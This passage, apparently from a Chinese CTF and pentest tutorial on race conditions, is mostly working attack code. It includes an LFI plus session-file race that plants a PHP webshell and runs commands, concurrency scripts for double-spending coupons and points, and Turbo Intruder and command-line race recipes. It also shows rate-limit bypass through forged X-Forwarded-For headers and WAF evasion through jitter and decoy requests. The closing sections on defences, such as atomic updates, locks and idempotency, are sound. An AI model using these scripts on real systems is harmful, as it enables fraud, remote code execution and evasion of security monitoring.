// 可以利用 LFI + Session 文件竞争写入 WebShell
// 第一步:找到 LFI 漏洞
// include($_GET['page'] . '.php');
// 第二步:Session 文件内容可控(通过 user 参数写入 session)
session_start();
$_SESSION['data'] = $_GET['data']; // 用户可控 → 写入 session 文件
// 第三步:
// 并发 1:发送含 PHP 代码的 data 参数
// data = <?php system($_GET['cmd']); ?>
// 并发 2:LFI 包含 session 文件
// page = /tmp/sess_SESSID(去掉 .php 后缀的情况需绕过)
// Session 文件内容示例(/tmp/sess_abc123):
// data|s:30:"<?php system($_GET['cmd']); ?>";
?>
#!/usr/bin/env python3
"""PHP Session 文件 + LFI 竞争"""
import threading, requests
TARGET = "http://target.com"
SESS_ID = "abc123def456" # 已知或可预测的 Session ID
SHELL_CODE = "<?php system($_GET['cmd']); ?>"
session_with_shell = requests.Session()
session_with_shell.cookies.set("PHPSESSID", SESS_ID)
def write_shell_to_session():
"""持续将 Shell 代码写入 Session"""
while not stop.is_set():
session_with_shell.get(
f"{TARGET}/page.php",
params={"data": SHELL_CODE},
timeout=3
)
def lfi_include_session():
"""持续通过 LFI 包含 Session 文件"""
s = requests.Session()
while not stop.is_set():
r = s.get(
f"{TARGET}/view.php",
params={
"file": f"/tmp/sess_{SESS_ID}",
"cmd": "id"
},
timeout=3
)
if "uid=" in r.text:
stop.set()
print(f"[!] 成功!{r.text[:200]}")
stop = threading.Event()
threads = (
[threading.Thread(target=write_shell_to_session) for _ in range(5)] +
[threading.Thread(target=lfi_include_session) for _ in range(5)]
)
for t in threads: t.daemon = True; t.start()
for t in threads: t.join(timeout=30)
7.3 Flask/Django 竞争场景
# ── Flask 漏洞场景 ──
from flask import Flask, session, request, jsonify
from database import db
app = Flask(__name__)
# 危险:非原子的积分扣除操作
@app.route('/api/redeem', methods=['POST'])
def redeem():
user_id = session['user_id']
item_id = request.json['item_id']
item = db.items.get(item_id)
# ① 检查积分
user = db.users.get(user_id)
if user['points'] < item['cost']:
return jsonify({"error": "积分不足"}), 400
# ── 竞争窗口 ──
# Flask 默认多线程处理请求(threaded=True)
# 多个请求可以同时到达这里
# ② 扣除积分
db.execute(
"UPDATE users SET points = points - ? WHERE id = ?",
item['cost'], user_id
)
# ③ 发放商品
db.execute(
"INSERT INTO user_items (user_id, item_id) VALUES (?, ?)",
user_id, item_id
)
return jsonify({"success": True})
#!/usr/bin/env python3
"""针对 Python Web 应用的竞争攻击"""
import asyncio, aiohttp
TARGET = "http://target.com"
COOKIES = {"session": "YOUR_SESSION_COOKIE"}
async def redeem_item(session, item_id, idx):
try:
async with session.post(
f"{TARGET}/api/redeem",
json = {"item_id": item_id},
cookies = COOKIES,
timeout = aiohttp.ClientTimeout(total=10)
) as r:
return {"idx": idx, "status": r.status, "body": await r.text()}
except Exception as e:
return {"idx": idx, "error": str(e)}
async def main():
N = 40
async with aiohttp.ClientSession() as s:
# 并发兑换同一商品 40 次
tasks = [redeem_item(s, item_id=1001, idx=i) for i in range(N)]
results = await asyncio.gather(*tasks)
ok = sum(1 for r in results if r.get("status") == 200)
print(f"[+] Python 应用竞争成功 {ok}/{N} 次")
# 理论上 40 积分应只能兑换 1 件商品
# 竞争成功后可兑换多件
asyncio.run(main())
八、CTF 实战思路与工具
8.1 解题决策树
发现可能存在竞争漏洞的功能
│
├── 识别特征
│ ├── "只能使用一次" 的限制
│ ├── "每用户限制 N 次" 的配额
│ ├── 余额/积分/库存检查后扣除
│ ├── 文件上传 + 验证 + 删除/移动
│ ├── Token/验证码一次性使用
│ └── 先检查再执行的二步操作
│
├── 分析竞争窗口
│ ├── 找到"检查"和"执行"之间的操作
│ ├── 是否涉及外部 I/O(数据库/文件)→ 窗口更大
│ ├── 估算窗口大小(>1ms 普通并发,<1ms 需单包攻击)
│ └── 是否有事务保护(SELECT FOR UPDATE / SERIALIZABLE)
│
├── 选择攻击方式
│ ├── 窗口 > 10ms → 普通并发(threading / asyncio)
│ ├── 窗口 1-10ms → 最后字节同步 / 高并发
│ ├── 窗口 < 1ms → HTTP/2 单包攻击
│ └── 文件竞争 → 持续上传 + 持续访问
│
├── 调整参数
│ ├── 增加并发数(10 → 50 → 100)
│ ├── 开启连接预热
│ ├── 使用 Barrier 同步
│ └── 多次尝试(竞争具有概率性)
│
└── 验证结果
├── 成功次数 > 1 → 竞争漏洞存在
├── 检查副作用(余额变化/文件存在/权限变化)
└── 利用竞争读取 flag / 获取权限
8.2 常见 CTF 竞争题型
# ══ 题型一:优惠码/优惠券无限使用 ══
# 并发调用 redeem/apply-coupon 端点
# 成功多次 → 获得超额折扣/积分/flag
# ══ 题型二:文件上传竞争 ══
# 上传 WebShell → 在删除前访问
# PHP 场景:shell.php 被验证删除前执行
# 通常需要:5 上传线程 + 5 访问线程
# ══ 题型三:账户余额/积分超额消费 ══
# 账户只有 100 积分,商品需 100 积分
# 并发 50 个兑换请求 → 兑换多个商品
# → 商品可能包含 flag 或权限
# ══ 题型四:验证码/Token 竞争 ══
# 获得一次性 Token → 并发使用多次
# 第一次:实际修改
# 后续:利用竞争执行更多操作
# ══ 题型五:注册竞争 ══
# 并发注册 admin 用户名/邮箱
# 两个请求都通过唯一性检查
# → 创建两个 admin 账号(其中一个可能有管理员权限)
# ══ 题型六:并发下单 ══
# 库存 = 1,价格 = 100000(买不起)
# 发现 VIP 优惠码 = 99% 折扣
# 竞争:同时应用优惠 + 下单
# → 以极低价格购买商品 → 获得 flag
8.3 Burp Suite 竞争攻击详细流程
── 方法一:Turbo Intruder 竞争脚本 ──
① 在 Proxy 拦截目标请求
② 右键 → Extensions → Turbo Intruder → Send to Turbo Intruder
③ 粘贴以下脚本:
def queueRequests(target, wordlists):
engine = RequestEngine(
endpoint = target.endpoint,
concurrentConnections = 1,
requestsPerConnection = 20,
pipeline = False,
)
for _ in range(20):
engine.queue(target.req, gate='race1')
engine.openGate('race1')
def handleResponse(req, interesting):
table.add(req)
④ 点击 Attack 按钮
⑤ 观察响应表格中是否有多个 200 成功响应
── 方法二:Repeater 请求组(Burp 2023+)──
① 在 Repeater 中构造请求
② 右键 → Add to group(或 Ctrl+G)
③ 复制多个 Tab 到同一组
④ 选择组 → Send group (single-packet attack)
⑤ 观察响应时序
── 方法三:Intruder 并发 ──
① 发送到 Intruder
② Attack type: Sniper
③ 添加一个参数为 payload(如线程编号)
④ Payloads: 数字列表 1-50
⑤ Resource Pool: 创建新资源池
Maximum concurrent requests: 50
Delay between requests: 0
⑥ Start Attack
8.4 竞争攻击辅助工具
# ── 工具一:race-the-web ──
# Go 语言编写的竞争条件测试工具
# https://github.com/nicowillis/race-the-web
go install github.com/nicowillis/race-the-web@latest
# 配置文件 config.toml
cat > config.toml << 'EOF'
[[request]]
method = "POST"
url = "http://target.com/api/coupon/use"
body = '{"code":"RACE50","user_id":1001}'
headers = {"Content-Type"="application/json", "Cookie"="session=xxx"}
count = 50 # 并发数
verbose = true
EOF
race-the-web config.toml
# ── 工具二:ffuf 并发测试 ──
# 使用 ffuf 进行并发请求
ffuf -u "http://target.com/api/coupon/use" \
-X POST \
-H "Content-Type: application/json" \
-d '{"code":"RACE50","user_id":1001}' \
-w /dev/stdin \
-t 50 \
<<< $(for i in $(seq 1 50); do echo $i; done)
# ── 工具三:ab(Apache Benchmark)──
# 100 个并发请求,共 1000 次
ab -n 1000 -c 100 \
-T "application/json" \
-p /tmp/payload.json \
"http://target.com/api/coupon/use"
# ── 工具四:vegeta ──
# 精确的 HTTP 负载测试工具
echo "POST http://target.com/api/coupon/use" | \
vegeta attack \
-rate=0 \
-max-workers=50 \
-duration=0 \
-body=/tmp/payload.json \
-header="Content-Type: application/json" | \
vegeta report
九、WAF 绕过与对抗
9.1 速率限制绕过
#!/usr/bin/env python3
"""
绕过速率限制的并发攻击技巧
"""
import asyncio, aiohttp, random
TARGET = "http://target.com"
# ── 技巧一:轮换请求头(绕过基于 User-Agent 的限制)──
USER_AGENTS = [
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15",
"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36",
"PostmanRuntime/7.32.1",
"python-requests/2.31.0",
]
# ── 技巧二:轮换 IP(绕过基于 IP 的速率限制)──
# 如果有多个出口 IP(VPN/代理池)
PROXIES = [
"http://proxy1:8080",
"http://proxy2:8080",
"http://proxy3:8080",
]
# ── 技巧三:X-Forwarded-For 伪造(绕过简单 IP 限制)──
# 注意:只对不正确实现的 rate limit 有效
FAKE_IPS = [f"192.168.{i}.{j}" for i in range(1,20) for j in range(1,20)]
async def race_with_header_rotation(url, data, n=50):
"""使用请求头轮换绕过简单的速率限制"""
results = []
async with aiohttp.ClientSession() as s:
async def single(idx):
headers = {
"User-Agent": random.choice(USER_AGENTS),
"X-Forwarded-For": random.choice(FAKE_IPS),
"X-Real-IP": random.choice(FAKE_IPS),
"Content-Type": "application/json",
}
try:
async with s.post(url, json=data,
headers=headers,
timeout=aiohttp.ClientTimeout(total=10)) as r:
return {"idx": idx, "status": r.status}
except Exception as e:
return {"idx": idx, "error": str(e)}
tasks = [single(i) for i in range(n)]
results = await asyncio.gather(*tasks)
ok = sum(1 for r in results if r.get("status") == 200)
print(f"[+] 成功 {ok}/{n}")
return results
asyncio.run(race_with_header_rotation(
f"{TARGET}/api/coupon/use",
{"code": "TEST50", "user_id": 1001}
))
9.2 WAF 检测竞争请求的规避
#!/usr/bin/env python3
"""
规避 WAF 对并发攻击的检测
"""
import threading, requests, time, random
TARGET = "http://target.com"
# ── 规避策略一:加入随机微延迟(避免完全一致的时序特征)──
def jittered_race(url, data, n=30, jitter_ms=5):
"""带抖动的竞争攻击(避免被 WAF 识别为自动化攻击)"""
results = [None] * n
barrier = threading.Barrier(n)
def worker(idx):
barrier.wait()
# 加入 0-jitter_ms 毫秒的随机延迟
time.sleep(random.uniform(0, jitter_ms / 1000))
r = requests.post(url, json=data, timeout=10)
results[idx] = r.status_code
threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
for t in threads: t.start()
for t in threads: t.join()
return results
# ── 规避策略二:混合正常请求(降低请求密度)──
def mixed_race(url, data, decoy_url, n=20):
"""混合正常请求,降低竞争请求的识别特征"""
results = []
def attack_request(idx):
r = requests.post(url, json=data, timeout=10)
results.append({"type": "attack", "status": r.status_code})
def decoy_request():
requests.get(decoy_url, timeout=5)
threads = []
for i in range(n):
threads.append(threading.Thread(target=attack_request, args=(i,)))
# 每个攻击请求混入 2 个正常请求
threads.append(threading.Thread(target=decoy_request))
threads.append(threading.Thread(target=decoy_request))
barrier = threading.Barrier(len(threads))
for t in threads:
original_run = t._target
original_args = t._args
def new_run(fn=original_run, args=original_args):
barrier.wait()
fn(*args)
t.run = new_run
for t in threads: t.start()
for t in threads: t.join()
return results
十、防御措施
10.1 数据库层面防御
-- ══ 方案一:原子性 UPDATE(最推荐)══
-- 将"检查 + 修改"合并为一个原子操作
-- 只有条件满足时才更新,通过返回的影响行数判断
-- 优惠券使用(原子操作)
UPDATE coupons
SET used = TRUE, used_by = ?, used_at = NOW()
WHERE code = ? AND used = FALSE;
-- 返回影响行数:1 = 成功,0 = 已使用或无效
-- 余额扣除(带条件检查)
UPDATE accounts
SET balance = balance - ?
WHERE user_id = ? AND balance >= ?;
-- 返回影响行数:1 = 成功,0 = 余额不足(原子检查!)
-- 库存扣减
UPDATE products
SET stock = stock - ?
WHERE id = ? AND stock >= ?;
-- ══ 方案二:SELECT FOR UPDATE(悲观锁)══
BEGIN;
SELECT balance FROM accounts
WHERE user_id = 1001
FOR UPDATE; -- 行级写锁,其他事务等待
-- 在此执行检查和更新
UPDATE accounts SET balance = balance - 100 WHERE user_id = 1001;
COMMIT;
-- ══ 方案三:乐观锁(版本号)══
-- 读取时记录版本号
SELECT balance, version FROM accounts WHERE user_id = 1001;
-- 更新时检查版本号
UPDATE accounts
SET balance = balance - 100, version = version + 1
WHERE user_id = 1001 AND version = ?;
-- 若返回 0 行 → 被其他事务修改 → 重试
-- ══ 方案四:UNIQUE 约束 + INSERT IGNORE ══
-- 防止重复使用
INSERT INTO coupon_usage (coupon_code, user_id)
VALUES (?, ?)
ON DUPLICATE KEY UPDATE id = id; -- MySQL
-- 或
INSERT INTO coupon_usage (coupon_code, user_id)
VALUES (?, ?)
ON CONFLICT DO NOTHING; -- PostgreSQL
-- 通过唯一约束确保只能插入一条记录
10.2 应用层面防御
# ── 方案一:分布式锁(Redis)──
import redis
import uuid
import time
redis_client = redis.Redis(host='localhost', port=6379)
class DistributedLock:
def __init__(self, key: str, expire: int = 10):
self.key = f"lock:{key}"
self.token = str(uuid.uuid4())
self.expire = expire
def acquire(self, timeout: float = 5.0) -> bool:
"""尝试获取锁(带超时)"""
deadline = time.time() + timeout
while time.time() < deadline:
# SET key value NX EX expire(原子性 SET + 检查)
ok = redis_client.set(
self.key, self.token,
nx=True, ex=self.expire
)
if ok:
return True
time.sleep(0.01) # 10ms 重试间隔
return False
def release(self):
"""释放锁(使用 Lua 脚本保证原子性)"""
lua = """
if redis.call('get', KEYS[1]) == ARGV[1] then
return redis.call('del', KEYS[1])
else
return 0
end
"""
redis_client.eval(lua, 1, self.key, self.token)
def __enter__(self):
if not self.acquire():
raise Exception(f"获取锁超时:{self.key}")
return self
def __exit__(self, *args):
self.release()
# ── 使用分布式锁 ──
@app.route('/api/coupon/use', methods=['POST'])
def use_coupon():
user_id = session['user_id']
code = request.json['code']
# 对每个用户+优惠码组合加锁(防止同一用户并发使用)
lock_key = f"coupon:{code}:{user_id}"
try:
with DistributedLock(lock_key, expire=5):
# 在锁保护下执行检查和更新
coupon = db.query_one("SELECT * FROM coupons WHERE code=?", code)
if not coupon or coupon['used']:
return jsonify({"error": "无效"}), 400
db.execute("UPDATE coupons SET used=1 WHERE code=?", code)
db.execute("UPDATE users SET balance=balance+50 WHERE id=?", user_id)
return jsonify({"success": True})
except Exception as e:
return jsonify({"error": "请求过于频繁,请重试"}), 429
# ── 方案二:幂等性设计 ──
import hashlib, redis, json
redis_client = redis.Redis()
def idempotent_operation(idempotency_key: str, operation, *args):
"""
幂等性操作包装器
相同的 idempotency_key 只执行一次
"""
cache_key = f"idempotent:{idempotency_key}"
# 检查是否已执行过
cached = redis_client.get(cache_key)
if cached:
return json.loads(cached) # 返回之前的结果
# 执行操作(使用 SETNX 确保只执行一次)
lock_key = f"lock:{cache_key}"
if not redis_client.setnx(lock_key, 1):
# 其他请求正在执行,等待
for _ in range(50):
import time; time.sleep(0.1)
cached = redis_client.get(cache_key)
if cached:
return json.loads(cached)
raise Exception("操作超时")
try:
redis_client.expire(lock_key, 30)
result = operation(*args)
# 缓存结果(避免重复执行)
redis_client.setex(cache_key, 3600, json.dumps(result))
return result
finally:
redis_client.delete(lock_key)
# 使用:前端传入幂等性 Key(如 UUID)
@app.route('/api/payment', methods=['POST'])
def payment():
idem_key = request.headers.get('Idempotency-Key')
if not idem_key:
return jsonify({"error": "缺少 Idempotency-Key"}), 400
user_id = session['user_id']
amount = request.json['amount']
def do_payment():
# 实际扣款逻辑
db.execute("UPDATE accounts SET balance=balance-? WHERE id=?",
amount, user_id)
return {"success": True, "txn_id": str(uuid.uuid4())}
result = idempotent_operation(
f"{user_id}:{idem_key}",
do_payment
)
return jsonify(result)
10.3 文件操作防御
import os, uuid, magic, hashlib
ALLOWED_MIME_TYPES = {'image/jpeg', 'image/png', 'image/gif', 'image/webp'}
UPLOAD_BASE = '/var/secure/uploads'
def safe_upload(file_data: bytes, original_name: str) -> str:
"""安全的文件上传处理"""
# ① 检查文件魔术字节(而不是扩展名)
mime = magic.from_buffer(file_data, mime=True)
if mime not in ALLOWED_MIME_TYPES:
raise ValueError(f"不允许的文件类型:{mime}")
# ② 生成随机文件名(不使用原始文件名)
ext = {'image/jpeg': '.jpg', 'image/png': '.png',
'image/gif': '.gif', 'image/webp': '.webp'}[mime]
new_name = f"{uuid.uuid4().hex}{ext}"
# ③ 原子性写入(先写临时文件,再原子重命名)
tmp_path = f"/tmp/upload_{uuid.uuid4().hex}"
final_path = os.path.join(UPLOAD_BASE, new_name)
try:
with open(tmp_path, 'wb') as f:
f.write(file_data)
# os.rename 是原子操作(同一文件系统)
# 避免了先创建空文件再写入的竞争
os.rename(tmp_path, final_path)
except Exception as e:
if os.path.exists(tmp_path):
os.unlink(tmp_path)
raise e
return new_name
# 文件上传目录权限配置
# chmod 700 /var/secure/uploads → 只有 Web 用户可访问,不可直接 HTTP 访问
# 通过应用层提供受控的文件下载,不直接暴露目录
10.4 防御检查清单
数据库层:
✅ 所有余额/库存/次数的扣减使用带条件的原子 UPDATE
✅ 关键操作使用数据库事务(至少 READ COMMITTED 隔离级别)
✅ 高并发场景使用 SELECT FOR UPDATE 行锁
✅ 唯一性约束使用数据库 UNIQUE INDEX(而非应用层检查)
✅ 避免在应用层执行"先 SELECT 再 UPDATE"的两步操作
应用层:
✅ 对关键操作实施分布式锁(Redis SETNX / Redlock)
✅ 设计幂等 API(使用 Idempotency-Key)
✅ 对同一用户的相同操作添加请求级别的防重复机制
✅ 异步任务使用消息队列(单消费者确保顺序)
文件操作:
✅ 文件验证和存储合并为原子操作(先验证,通过后原子写入)
✅ 使用随机文件名(不可预测)
✅ 临时文件目录不可通过 HTTP 直接访问
✅ 使用文件魔术字节验证,而非扩展名
接口层:
✅ 对高敏感接口添加速率限制(IP + 用户双维度)
✅ 关键操作添加验证码/二次确认
✅ 监控异常的并发请求模式(同一用户短时间大量相同请求)
✅ 在响应中包含幂等性标识,避免客户端重复发送
监控与审计:
✅ 记录所有关键操作的执行日志(含时间戳和请求 ID)
✅ 对余额/积分/库存异常变化设置告警
✅ 定期检查数据一致性(如余额不应为负)
✅ 部署 WAF 规则,检测短时间内大量相同请求
附录
A. 竞争条件漏洞速查表
| 场景 | 竞争点 | 攻击方式 | 影响 |
|---|---|---|---|
| 优惠码使用 | 检查 used=0 → 标记 used=1 | 并发 50 请求 | 多次使用 |
| 余额扣款 | 检查余额 → 扣减余额 | 并发请求 | 余额透支 |
| 文件上传 | 文件验证 → 文件删除 | 上传+访问循环 | WebShell RCE |
| 密码重置 | Token 验证 → Token 消费 | 并发请求 | Token 多次用 |
| 积分兑换 | 检查积分 → 扣除积分 | 并发请求 | 负积分 |
| 用户注册 | 邮箱唯一性检查 → 插入 | 并发注册 | 重复账号 |
| OTP 验证 | 验证 OTP → 标记已用 | 并发验证 | OTP 复用 |
| 账号封禁 | 读封禁状态 → 执行操作 | 竞争时机 | 绕过封禁 |
| 文件删除 | 检查权限 → 删除文件 | TOCTOU | 删除他人文件 |
| 库存购买 | 检查库存 → 扣减库存 | 并发下单 | 超卖 |
B. 工具速查
# ── Python 并发攻击(推荐)──
# 见本文脚本
# ── Burp Turbo Intruder ──
# 见第十七章
# ── race-the-web ──
go install github.com/nicowillis/race-the-web@latest
race-the-web config.toml
# ── Apache Benchmark ──
ab -n 1000 -c 100 -T application/json -p payload.json http://target.com/api/
# ── wrk(HTTP 基准测试)──
wrk -t10 -c50 -d5s -s race.lua http://target.com/api/
# ── Vegeta ──
echo "POST http://target.com/api/coupon" | vegeta attack -rate=0 -max-workers=50 -body=payload.json | vegeta report
# ── curl 并发(快速测试)──
for i in $(seq 1 50); do
curl -s -X POST http://target.com/api/coupon \
-H "Content-Type: application/json" \
-d '{"code":"TEST"}' &
done
wait
C. 关键 Python 库
# 安装所需库
pip install requests aiohttp httpx asyncio threading
# httpx(支持 HTTP/2 单包攻击)
pip install httpx[http2]
# 其他有用库
pip install python-magic # 文件类型检测
pip install redis # 分布式锁
D. 竞争条件 CTF 解题一键脚本模板
#!/usr/bin/env python3
"""
条件竞争 CTF 解题通用模板
根据题目需要修改 TARGET、PAYLOAD 和判断条件
"""
import asyncio, aiohttp, threading, requests
import time, sys, argparse
TARGET = "http://target.com"
N = 50 # 并发数
# ══ 方案一:asyncio 异步(推荐)══
async def async_race(url, payload, n=N, cookie=None):
headers = {}
if cookie:
headers["Cookie"] = cookie
async with aiohttp.ClientSession(headers=headers) as s:
tasks = [
s.post(url, json=payload, timeout=aiohttp.ClientTimeout(total=10))
for _ in range(n)
]
responses = await asyncio.gather(*tasks, return_exceptions=True)
ok = 0
for r in responses:
if not isinstance(r, Exception) and r.status == 200:
ok += 1
print(f"[+] asyncio 竞争:{ok}/{n} 成功")
return ok
# ══ 方案二:threading(备选)══
def thread_race(url, payload, n=N, cookie=None):
results = [None] * n
barrier = threading.Barrier(n)
headers = {"Content-Type": "application/json"}
if cookie:
headers["Cookie"] = cookie
def worker(idx):
barrier.wait()
r = requests.post(url, json=payload, headers=headers, timeout=10)
results[idx] = r.status_code
threads = [threading.Thread(target=worker, args=(i,)) for i in range(n)]
for t in threads: t.start()
for t in threads: t.join()
ok = sum(1 for r in results if r == 200)
print(f"[+] threading 竞争:{ok}/{n} 成功")
return ok
# ══ 主程序 ══
if __name__ == "__main__":
# 修改以下参数
URL = f"{TARGET}/api/coupon/use"
PAYLOAD = {"code": "FLAG_COUPON", "user_id": 1001}
COOKIE = "session=YOUR_SESSION_COOKIE"
print(f"[*] 目标:{URL}")
print(f"[*] 并发数:{N}")
print(f"[*] Payload:{PAYLOAD}")
print()
# 尝试 asyncio 方案
ok = asyncio.run(async_race(URL, PAYLOAD, N, COOKIE))
if ok <= 1:
print("[*] asyncio 效果不佳,尝试 threading 方案...")
ok = thread_race(URL, PAYLOAD, N, COOKIE)
if ok <= 1:
print("[!] 竞争窗口可能很小,建议尝试:")
print(" 1. 增加并发数(N=100+)")
print(" 2. 使用 HTTP/2 单包攻击(见 httpx 章节)")
print(" 3. 使用 Burp Turbo Intruder + gate 同步")
print(" 4. 检查是否需要预热连接")
else:
print(f"\n[!] 竞争成功!{ok} 次操作通过")
⚠️ 免责声明:本文档仅供 CTF 竞赛学习、安全研究及授权渗透测试使用。在未经授权的系统上进行条件竞争攻击属于违法行为,请在合法合规的环境中学习与实践。